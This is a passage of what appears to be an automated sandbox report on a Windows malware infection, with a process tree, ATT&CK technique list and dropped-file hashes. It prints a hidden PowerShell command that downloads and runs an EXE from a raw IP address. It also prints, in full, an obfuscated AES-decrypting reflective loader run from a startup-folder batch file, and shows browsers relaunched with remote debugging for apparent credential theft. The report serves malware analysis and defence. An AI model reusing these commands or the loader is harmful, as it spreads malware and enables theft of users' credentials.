      System Location Discovery: System Language Discovery
      PID:1200
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
      - C:\Users\Admin\AppData\Local\TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
        
        "C:\Users\Admin\AppData\Local\TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6016
- - C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1308
  - - C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1196
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 944
      4⤵
      Program crash
      PID:5344
- - C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5584
- - C:\Users\Admin\AppData\Local\Temp\1085418001\23364180fc.exe
    "C:\Users\Admin\AppData\Local\Temp\1085418001\23364180fc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:468
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:928
- - C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe
    "C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe
      "C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"
      4⤵
      Executes dropped EXE
      PID:4316
  - - C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe
      "C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3348
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 976
      4⤵
      Program crash
      PID:4480
- - C:\Users\Admin\AppData\Local\Temp\1085420001\05a2b4c051.exe
    "C:\Users\Admin\AppData\Local\Temp\1085420001\05a2b4c051.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085421041\tYliuwV.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6016
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5260
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3332
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5904
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3820
- - C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5244
  - - C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:5200
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xa8,0x104,0x7fffd2a5cc40,0x7fffd2a5cc4c,0x7fffd2a5cc58
        6⤵
        
        PID:4924
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1952 /prefetch:2
        6⤵
        
        PID:5740
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1816,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2196 /prefetch:3
        6⤵
        
        PID:2192
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2336,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2492 /prefetch:8
        6⤵
        
        PID:5992
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5744
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3372 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5056
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4476,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4188 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5724
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8
        6⤵
        
        PID:1768
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
        6⤵
        
        PID:4520
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4996,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4900 /prefetch:8
        6⤵
        
        PID:2380
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,5631568776851213464,12869894405655032076,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5048 /prefetch:8
        6⤵
        
        PID:208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:4104
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd2a646f8,0x7fffd2a64708,0x7fffd2a64718
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1964
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        6⤵
        
        PID:6120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        6⤵
        
        PID:3480
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
        6⤵
        
        PID:3468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5168
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3200
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4204
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,9869411902438015026,2507474363377004160,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\a1ng4" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:548
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 956
      4⤵
      Program crash
      PID:5156
- - C:\Users\Admin\AppData\Local\Temp\1085424001\36ef8d9a36.exe
    "C:\Users\Admin\AppData\Local\Temp\1085424001\36ef8d9a36.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- - C:\Users\Admin\AppData\Local\Temp\1085425001\0b87b998dd.exe
    "C:\Users\Admin\AppData\Local\Temp\1085425001\0b87b998dd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2952

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2708 -ip 2708
1⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:3996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1308 -ip 1308
1⤵
PID:3288

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5260 -ip 5260
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1764 -ip 1764
1⤵
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5244 -ip 5244
1⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5608

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5056

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2752

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2080

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5352

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1532

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:4844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin:.repos

Filesize
1.2MB

MD5
9c12a2873f8cb90181a96768b62fff99

SHA1
471506f4c2d76a5466216ae35e7282e6528e3232

SHA256
97be91ff293a5709199c061f47d389dc720f882e8eeff2c6f4cd26b185e89bb8

SHA512
4cebc0705477fbd211d61546d8beda9d0e2a58602d8673110e7f5258ce3b1aaad49ae2e406849e22b8629f72cf8bc2ea5f5be33a85594403c9e104baa1e0a7a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
fca79fb6982b039a708b48419b725fc3

SHA1
03b5dcf0e4762c73a4407c5261232fd8c7a640e2

SHA256
7379dfffa6d218e67131438e37e898bd90face70a1a57f2e90bac25ec50477a8

SHA512
443af87e83d272dd232a1dd0b91e38b587ef8d52e1d8d1c90bf56ef701eb1c7124fb028be5f35dbd89b97cd9f5e9a0df51306dcce6243f8959b87c910d7f0e86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1bed6483de34dd709e03fd3af839a76b

SHA1
3724a38c9e51fcce7955a59955d16bf68c083b92

SHA256
37a42554c291f46995b2487d08d80d94cefe6c7fb3cb4ae9c7c5e515d6b5e596

SHA512
264f6687ea8a8726b0000de1511b7b764b3d5a6f64946bb83a58effda42839e593de43865dafeeb89f5b78cc00d16f3979b417357fa2799ca0533bdf72f07fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fe6fb7ffeb0894d21284b11538e93bb4

SHA1
80c71bf18f3798129931b1781115bbef677f58f0

SHA256
e36c911b7dbea599da8ed437b46e86270ce5e0ac34af28ac343e22ecff991189

SHA512
3a8bd7b31352edd02202a7a8225973c10e3d10f924712bb3fffab3d8eea2d3d132f137518b5b5ad7ea1c03af20a7ab3ff96bd99ec460a16839330a5d2797753b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6baeed80-ec82-404c-9ad1-6ef70577b169.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b706e857db0440088e2c8f85090cd8fb

SHA1
ce2e8820ec3480f79bc184eb934012dcc028cf45

SHA256
45d8b09c7f110b6a902bbca8252939667602822dc7615f34503c0f2c92ffacd4

SHA512
0aef886099f832f42c655d04d6159fbafa3c6ec48158ae908f2c2fe04b9fe36d15403f76a400c110715b116399ea08e23071f4575912e7dd816f4fca402fb09d

Download Submit
